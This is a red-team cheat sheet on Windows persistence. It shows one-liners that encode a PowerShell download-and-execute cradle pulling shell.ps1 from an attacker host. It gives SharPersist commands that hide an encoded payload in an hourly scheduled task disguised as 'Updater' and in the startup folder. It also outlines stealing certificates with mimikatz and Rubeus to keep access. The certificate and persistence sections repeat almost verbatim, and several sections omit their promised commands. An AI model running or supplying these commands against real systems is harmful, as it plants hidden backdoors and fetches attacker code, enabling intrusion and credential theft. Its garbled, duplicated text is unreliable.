search
TwitterBlog

Windows

hashtag
Encoding commands

In most cases, the commands you want to execute might have special characters, so the best way is to encode them to avoid errors while executing.

  • Windows

$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

  • Linux

str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0

hashtag
Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

hashtag
StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

hashtag
WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

hashtag
Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

hashtag
User

1. Enumerate the certificates on the machine

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

3. Base64 encode the pfx file.

4. Use Rubeus to obtain a TGT.

hashtag
Computer

You must be admin

1. Extract the machine certificates.

2. Base64 encode the pfx file.

3. Request a TGT

hashtag
Task Scheduler

A task that will be executed hourly.

hashtag
StartUp Folder

This command will be executed once the user logs in.

hashtag
WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

hashtag
Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

hashtag
User

1. Enumerate the certificates on the machine

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

3. Base64 encode the pfx file.

4. Use Rubeus to obtain a TGT.

hashtag
Computer

You must be admin 1. Extract the machine certificates.

2. Base64 encode the pfx file.

3. Request a TGT

Last updated